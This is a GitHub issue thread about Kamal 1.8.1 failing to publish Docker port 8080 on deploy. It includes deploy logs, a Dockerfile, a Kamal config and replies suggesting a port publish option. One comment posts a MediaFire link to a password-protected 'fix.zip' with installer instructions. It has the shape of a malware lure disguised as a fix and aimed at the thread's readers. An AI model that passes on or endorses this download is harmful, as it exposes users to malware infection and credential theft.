### ISSUE TITLE
kamal 1.8.1 fails to map a Docker port on deploy

### ISSUE THREAD

**Issue by aphexddb** [basecamp/kamal#913]
When kamal does a deploy, the `docker run` command doesn't set a container port mapping, e.g. `-p 8080:8080`. This results in the app container not being able to accept traffic. Here is the log of the `docker run` command:

```
INFO [d084c08d] Running docker run --detach --restart unless-stopped --name myapp-web-latest --hostname 10.0.0.1-0252151ef73c -e KAMAL_CONTAINER_NAME="myapp-web-latest" -e KAMAL_VERSION="latest" --env-file .kamal/env/roles/myapp-web.env --env PORT="8080" --health-cmd "(curl http://localhost:8080/_status) && (stat /tmp/kamal-cord/cord > /dev/null || exit 1)" --health-interval "1s" --volume $(pwd)/.kamal/cords/myapp-web-dcf33760c16ff9cace045b8a66be6491:/tmp/kamal-cord --log-opt max-size="10m" --label service="myapp" --label role="web" --label destination --label traefik.http.services.myapp-web.loadbalancer.server.scheme="http" --label traefik.http.routers.myapp-web.rule="PathPrefix(\`/\`)" --label traefik.http.routers.myapp-web.priority="2" --label traefik.http.middlewares.myapp-web-retry.retry.attempts="5" --label traefik.http.middlewares.myapp-web-retry.retry.initialinterval="500ms" --label traefik.http.routers.myapp-web.middlewares="myapp-web-retry@docker" registry.digitalocean.com/mything/myapp:latest 
```

Resulting container status after the deploy, showing the app at port 8080 per the Dockerfile but not exposed:

```
CONTAINER ID   IMAGE                                          COMMAND                  CREATED          STATUS                    PORTS                                       NAMES
916d920a6a26   traefik:v2.10                                  "/entrypoint.sh --pr…"   15 minutes ago   Up 15 minutes             0.0.0.0:80->80/tcp, :::80->80/tcp           traefik
bce8658bd6d1   registry.digitalocean.com/mything/myapp:latest "/app"                   16 minutes ago   Up 16 minutes (healthy)   8080/tcp                                    myapp-web-latest
267a13aebe10   redis:7.0                                      "docker-entrypoint.s…"   11 hours ago     Up 35 minutes             0.0.0.0:6379->6379/tcp, :::6379->6379/tcp   myapp-redis
```

Dockerfile used for reference:
```
FROM golang:1.23

COPY / ./
RUN CGO_ENABLED=0 GOOS=linux go build -ldflags '-w -s' -o /app

EXPOSE 8080

ENTRYPOINT ["/app"]
```
versions used
* Ubuntu 24.04 LTS
* kamal version 1.8.1
* Docker version 27.1.2, build d01f264

kamal config:
```yml
service: myapp
image: myapp

servers:
  - 10.0.0.1

registry:
  server: registry.digitalocean.com/mything
  username:
    - KAMAL_REGISTRY_USERNAME
  password:
    - KAMAL_REGISTRY_PASSWORD

env:
  clear:
    PORT: 8080

builder:
  local:
    arch: amd64
    host: /var/run/docker.sock
  context: .

accessories:
  redis:
    image: redis:7.0
    host: 10.0.0.1
    port: 6379
    directories:
      - data:/data

traefik:
  args:
    accesslog: true
    log.level: DEBUG

healthcheck:
  path: /_status
  port: 8080
  max_attempts: 5
  cmd: curl http://localhost:8080/_status

```

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aphexddb** [comment]
Running service on port 3000 magically works

**Comment by romanakash** [comment]
Might need

```
  web:
    hosts:
      - ip
    options:
      publish:
        - "8080:8080"

```

kamal automatically publishes port 3000

**Comment by romanakash** [comment]
Might need

```
  web:
    hosts:
      - ip
    options:
      publish:
        - "8080:8080"

```

kamal automatically publishes port 3000
